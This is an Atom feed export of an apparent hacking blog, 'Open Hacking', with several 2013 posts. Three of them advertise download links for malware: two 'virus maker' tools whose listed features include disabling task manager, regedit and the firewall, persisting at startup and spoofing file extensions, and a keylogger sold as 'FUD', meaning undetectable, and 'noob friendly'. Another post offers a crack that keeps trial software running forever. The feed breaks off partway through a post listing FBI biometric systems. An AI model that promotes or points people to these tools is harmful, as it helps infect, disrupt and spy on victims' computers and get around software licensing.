<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2112164836966994080</id><updated>2025-09-29T00:27:39.641-07:00</updated><category term="Hacking Tools And Programs"/><category term="Hacking Tutorials"/><category term="Keylogger"/><category term="Computer Security"/><category term="ebooks"/><category term="Free Download"/><category term="Misc"/><category term="malware"/><category term="Remote Adminstration Tool"/><category term="Coding"/><category term="Wifi WPA WEP Wireless Hacking"/><category term="software"/><category term="Malware Source"/><category term="Video Tutorials"/><category term="Black SEO and Internet Marketing"/><category term="FUD Crypters"/><category term="templates"/><category term="Anti-keylogger"/><category term="Linux"/><category term="New technology in bio-metric identification"/><category term="antikeylogger source code"/><category term="it security"/><category term="penetration testing"/><category term="virus maker new"/><title type='text'>Open Hacking</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>102</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-3613210406844261171</id><published>2013-08-21T06:24:00.002-07:00</published><updated>2013-08-21T06:24:56.688-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="virus maker new"/><title type='text'>Ultimate Virus Builder - Create your virus in seconds ! [MEDIAFIRE]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR9QaMgQlh5PmJn6m7Sl83wVfCb29z2kEBGzQmEuqO8ZQzenjsBqZPjUjDa_6K6Rw407wj4N9KcRKF7QjplR3gFgLM3u6naGeL1k4uj0l-fAfijvomv4qQITagO3sDCz2mcGl6uczz4k8/s1600/ultimate+virus+maker.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR9QaMgQlh5PmJn6m7Sl83wVfCb29z2kEBGzQmEuqO8ZQzenjsBqZPjUjDa_6K6Rw407wj4N9KcRKF7QjplR3gFgLM3u6naGeL1k4uj0l-fAfijvomv4qQITagO3sDCz2mcGl6uczz4k8/s1600/ultimate+virus+maker.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #828282; font-family: HelveticaNeue-Light, &#39;Helvetica Neue Light&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, &#39;Lucida Grande&#39;, sans-serif; font-size: 1.1em; line-height: 1.5em; margin-bottom: 20px;&quot;&gt;
&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #828282; font-family: HelveticaNeue-Light, &#39;Helvetica Neue Light&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, &#39;Lucida Grande&#39;, sans-serif; font-size: 1.1em; line-height: 1.5em; margin-bottom: 20px;&quot;&gt;
&lt;strong&gt;Information:&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #828282; font-family: HelveticaNeue-Light, &#39;Helvetica Neue Light&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, &#39;Lucida Grande&#39;, sans-serif; font-size: 1.1em; line-height: 1.5em; margin-bottom: 20px;&quot;&gt;
The next generation of virus builders has finally arrived.&amp;nbsp;Ultimate Virus Builder&amp;nbsp;offers you more than 50 options to customize your virus to your likings. You can even select your own icon for your virus ! Not only does this tool allow you to create your own virusses, it can also help you spoof the extension of any file with the built in extension spoofer !&amp;nbsp;Ultimate Virus Builder&amp;nbsp;has an automatic update system, so you’ll never have to worry about downloading the latest version, isn’t that awesome? You don’t need to be a computer ‘geek’ to create virusses, all you need is&amp;nbsp;Ultimate Virus Builder.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #828282; font-family: HelveticaNeue-Light, &#39;Helvetica Neue Light&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, &#39;Lucida Grande&#39;, sans-serif; font-size: 1.1em; line-height: 1.5em; margin-bottom: 20px;&quot;&gt;
&lt;strong&gt;Options:&lt;/strong&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #828282; font-family: HelveticaNeue-Light, &#39;Helvetica Neue Light&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, &#39;Lucida Grande&#39;, sans-serif; font-size: 14px; line-height: 20px; list-style-position: inside; margin: 0px 0px 10px 21px; padding: 0px;&quot;&gt;
&lt;li&gt;Custom message on execution&lt;/li&gt;
&lt;li&gt;Add to startup&lt;/li&gt;
&lt;li&gt;Disable clipboard&lt;/li&gt;
&lt;li&gt;Disable taskmanager&lt;/li&gt;
&lt;li&gt;Disable CMD&lt;/li&gt;
&lt;li&gt;Disable System Repair&lt;/li&gt;
&lt;li&gt;Disable Msconfig&lt;/li&gt;
&lt;li&gt;Disable Explorer&lt;/li&gt;
&lt;li&gt;Disable Regedit&lt;/li&gt;
&lt;li&gt;Switch mouse buttons&lt;/li&gt;
&lt;li&gt;Hide taskbar&lt;/li&gt;
&lt;li&gt;Disconnect from the internet&lt;/li&gt;
&lt;li&gt;Many more !&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style=&quot;color: #828282; font-family: HelveticaNeue-Light, Helvetica Neue Light, Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 14px; line-height: 20px;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://www.mediafire.com/?jhh481yobw5p66z&quot; target=&quot;_blank&quot;&gt;DOWNLOAD&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/3613210406844261171/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2013/08/ultimate-virus-builder-create-your.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/3613210406844261171'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/3613210406844261171'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2013/08/ultimate-virus-builder-create-your.html' title='Ultimate Virus Builder - Create your virus in seconds ! [MEDIAFIRE]'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR9QaMgQlh5PmJn6m7Sl83wVfCb29z2kEBGzQmEuqO8ZQzenjsBqZPjUjDa_6K6Rw407wj4N9KcRKF7QjplR3gFgLM3u6naGeL1k4uj0l-fAfijvomv4qQITagO3sDCz2mcGl6uczz4k8/s72-c/ultimate+virus+maker.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-161547581737839091</id><published>2013-06-20T08:44:00.000-07:00</published><updated>2013-06-20T08:44:09.192-07:00</updated><title type='text'>Adf.ly blocked in india by the Director of Telecom DoT INDIA to access link use this Decryptor</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&amp;nbsp;Adf.ly blocked in india by the Director of Telecom DoT INDIA to access link use this Decryptor&lt;br /&gt;
&lt;br /&gt;
http://dead.altervista.org/&lt;br /&gt;
&lt;br /&gt;
just copy the adf.ly link and paste it in this tool and get the original link&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;sorry for inconvenience happened!&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/161547581737839091/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2013/06/adfly-blocked-in-india-by-director-of.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/161547581737839091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/161547581737839091'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2013/06/adfly-blocked-in-india-by-director-of.html' title='Adf.ly blocked in india by the Director of Telecom DoT INDIA to access link use this Decryptor'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-922324845249392398</id><published>2013-03-15T08:44:00.001-07:00</published><updated>2013-03-15T08:44:54.193-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="malware"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware Source"/><title type='text'>DeadLine&#39;s Virus Maker 1.8.5(Free Download)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Hello !&lt;br /&gt;
&lt;br /&gt;
DeadLine&#39;s Virus Maker 1.8.5 is a virus maker that I made because I do 
not trust all the other virus makers that are out there on the net. I 
worked on this for 8+ hours in total.&lt;br /&gt;
This application lets you create virusses, and you do not need to be a computer &quot;geek&quot; to do this. All you need, is this tool.&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Features:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;div class=&quot;spoiler_header&quot;&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=2112164836966994080&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;spoiler_body&quot; style=&quot;display: block;&quot;&gt;
* Show a messagebox on startup&lt;br /&gt;
* Add to windows startup&lt;br /&gt;
* Close MSN&lt;br /&gt;
* Close Skype&lt;br /&gt;
* Close Yahoo&lt;br /&gt;
* Disable mouse&lt;br /&gt;
* Force shutdown&lt;br /&gt;
* Force restart&lt;br /&gt;
* Infinite beeping&lt;br /&gt;
* Infinite messageboxes&lt;br /&gt;
* Disconnect from the internet&lt;br /&gt;
* Disable firewall&lt;br /&gt;
* Disable CMD&lt;br /&gt;
* Disable taskmanager&lt;br /&gt;
* Disable regedit&lt;br /&gt;
* Random mouse movement&lt;br /&gt;
* Random keyboard keys sent&lt;br /&gt;
* Disable notepad&lt;br /&gt;
* And more !&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;Screenshot:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5-ZXW23egeKbYeEZ7Z45jT9tKbsdmrpxDrBN7-J74skKOo67zaOsRye0N9d-9VrRZOKlTfrVIzofFiZFMe6BlK7I6185RAzh1x3DYWXrPEvUi0ovNW2eYmVkbZipy1U-mH0u5BZTpbjo/s1600/dvm.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5-ZXW23egeKbYeEZ7Z45jT9tKbsdmrpxDrBN7-J74skKOo67zaOsRye0N9d-9VrRZOKlTfrVIzofFiZFMe6BlK7I6185RAzh1x3DYWXrPEvUi0ovNW2eYmVkbZipy1U-mH0u5BZTpbjo/s1600/dvm.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;a href=&quot;http://adf.ly/KteSt&quot; target=&quot;_blank&quot;&gt;DOWNLOAD&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Credit:&lt;i&gt;DeadLine From HF&lt;/i&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/922324845249392398/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2013/03/hello-deadlines-virus-maker-1.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/922324845249392398'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/922324845249392398'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2013/03/hello-deadlines-virus-maker-1.html' title='DeadLine&#39;s Virus Maker 1.8.5(Free Download)'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5-ZXW23egeKbYeEZ7Z45jT9tKbsdmrpxDrBN7-J74skKOo67zaOsRye0N9d-9VrRZOKlTfrVIzofFiZFMe6BlK7I6185RAzh1x3DYWXrPEvUi0ovNW2eYmVkbZipy1U-mH0u5BZTpbjo/s72-c/dvm.png" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-5065414875154413099</id><published>2013-03-11T02:11:00.000-07:00</published><updated>2013-03-11T02:11:12.281-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Free Download"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware Source"/><title type='text'>Time stopper v3.00 free (stop the time for any try-out version software and you can use them forever.)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;span style=&quot;color: orange;&quot;&gt;&lt;b&gt;Time stopper v3.00 free software forever.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #6aa84f;&quot;&gt;This has got to be one of the best programs on this forum&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #6aa84f;&quot;&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot;&gt;Using this software you can stop the time for any try-out version software and you can use them forever.&lt;br /&gt;You stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time &amp;amp; date&lt;br /&gt;run normally on your system.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-jNgMGiZOz9HbNzjeMMesV1FmFuwqHlQYeJS9hTaVWO8q4DTn53YUFX-cVtrbDuWMrHBlY8vOmR6qvy5p1lYJ2vHH2m5cn5nPsNGGnyiKbBL7GJ8EgjPj5AoH5D8HQC8_YLAvxeFSZ8Y/s1600/00226372.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;time stopper v3.0 free&quot; border=&quot;0&quot; height=&quot;318&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-jNgMGiZOz9HbNzjeMMesV1FmFuwqHlQYeJS9hTaVWO8q4DTn53YUFX-cVtrbDuWMrHBlY8vOmR6qvy5p1lYJ2vHH2m5cn5nPsNGGnyiKbBL7GJ8EgjPj5AoH5D8HQC8_YLAvxeFSZ8Y/s320/00226372.jpg&quot; title=&quot;time stopper v3.0&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: #333333; color: limegreen; font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: white; color: limegreen; font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: white; color: limegreen; font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: white; color: limegreen; font-family: Verdana, Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://adf.ly/Ke3LQ&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/5065414875154413099/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2013/03/time-stopper-v300-free-stop-time-for.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/5065414875154413099'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/5065414875154413099'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2013/03/time-stopper-v300-free-stop-time-for.html' title='Time stopper v3.00 free (stop the time for any try-out version software and you can use them forever.)'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-jNgMGiZOz9HbNzjeMMesV1FmFuwqHlQYeJS9hTaVWO8q4DTn53YUFX-cVtrbDuWMrHBlY8vOmR6qvy5p1lYJ2vHH2m5cn5nPsNGGnyiKbBL7GJ8EgjPj5AoH5D8HQC8_YLAvxeFSZ8Y/s72-c/00226372.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-402124926921226994</id><published>2013-03-09T03:36:00.001-08:00</published><updated>2013-03-09T03:36:21.221-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="Keylogger"/><title type='text'>REFLECT LOGGER {Limitless Logger Trial} {NOOB FRIENDLY} {WORKING} {FUD}</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-diggUuLAb-8xf6cNduiYC4YExZ_PVeyEIzY6Cv8s3DnlXNLHJYlRJmf1wUSbTsj_AGXe0FTVJNSkN-lyxTClKOcxPyivmPJRndVI5RcOM7BvB1rUDlw9gpH0m4ocb0VMWiTpRnYqsPg/s1600/fud_keylogger_2013.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img alt=&quot;FUD KEYLOGGER SCREEN SHOT&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-diggUuLAb-8xf6cNduiYC4YExZ_PVeyEIzY6Cv8s3DnlXNLHJYlRJmf1wUSbTsj_AGXe0FTVJNSkN-lyxTClKOcxPyivmPJRndVI5RcOM7BvB1rUDlw9gpH0m4ocb0VMWiTpRnYqsPg/s1600/fud_keylogger_2013.jpg&quot; title=&quot;&quot; /&gt;&amp;nbsp;&lt;/a&gt;&lt;/td&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;REFLECT LOGGER- A FREE WORKING FUD KEYLOGGER&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;a href=&quot;http://adf.ly/KX9nJ&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;DOWNLOAD&lt;/b&gt;:&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/402124926921226994/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2013/03/reflect-logger-limitless-logger-trial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/402124926921226994'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/402124926921226994'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2013/03/reflect-logger-limitless-logger-trial.html' title='REFLECT LOGGER {Limitless Logger Trial} {NOOB FRIENDLY} {WORKING} {FUD}'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-diggUuLAb-8xf6cNduiYC4YExZ_PVeyEIzY6Cv8s3DnlXNLHJYlRJmf1wUSbTsj_AGXe0FTVJNSkN-lyxTClKOcxPyivmPJRndVI5RcOM7BvB1rUDlw9gpH0m4ocb0VMWiTpRnYqsPg/s72-c/fud_keylogger_2013.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-1006317409263728850</id><published>2013-02-16T04:05:00.000-08:00</published><updated>2013-02-16T04:05:00.719-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computer Security"/><category scheme="http://www.blogger.com/atom/ns#" term="New technology in bio-metric identification"/><title type='text'>FBI Criminal Justice Information Services Division Next Generation Identification</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;FBI Criminal Justice Information Services Division Next Generation Identification&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;Rap Back&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: lime;&quot;&gt;Rapid Mobile&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: greenyellow;&quot;&gt;Iris&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: cyan;&quot;&gt;Facial&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: turquoise;&quot;&gt;Latents&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: deepskyblue;&quot;&gt;Palms&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3J1cgz1eGqsO3pJkRSoJ195YIQllHMe40x6kfEGdXp0-y5EwKP6_I2Gqla6upy-0Z43rLTfA3K06x4zsJAupVzB9bbeqsJpKl7PXoGGmL2zlV8F7kJeZF6ftmFwfMUexVMeEBK-1er90/s1600/FBI-NGI-FOUO.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Next Generation Identification &quot; border=&quot;0&quot; height=&quot;480&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3J1cgz1eGqsO3pJkRSoJ195YIQllHMe40x6kfEGdXp0-y5EwKP6_I2Gqla6upy-0Z43rLTfA3K06x4zsJAupVzB9bbeqsJpKl7PXoGGmL2zlV8F7kJeZF6ftmFwfMUexVMeEBK-1er90/s640/FBI-NGI-FOUO.jpg&quot; title=&quot;FBI-NGI-FOUO&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;color: deepskyblue;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;Universal Face Workstation (UFW)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
* FBI user software to support access to NGI Face Pilot and NGI System face search capabilities&lt;br /&gt;
* Cross Platform (Windows, OSX, Linux)&lt;br /&gt;
* Built upon a Biometric Integration Platform&lt;br /&gt;
